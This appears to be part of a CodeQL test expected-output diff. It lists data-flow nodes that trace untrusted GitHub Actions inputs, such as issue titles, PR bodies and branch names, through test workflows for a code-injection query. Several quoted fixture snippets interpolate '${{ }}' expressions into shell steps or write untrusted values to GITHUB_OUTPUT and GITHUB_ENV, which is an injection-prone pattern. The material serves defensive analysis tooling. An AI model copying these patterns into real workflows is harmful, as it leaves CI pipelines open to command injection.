.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | +| .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | semmle.label | Job: updateJira [ISSUE_KEY] | +| .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | semmle.label | Uses Step: changed | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | semmle.label | Job outputs node [pr_num] | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | semmle.label | steps.set-ref.outputs.pr_num | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | semmle.label | Run Step: set-ref [pr_num] | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments 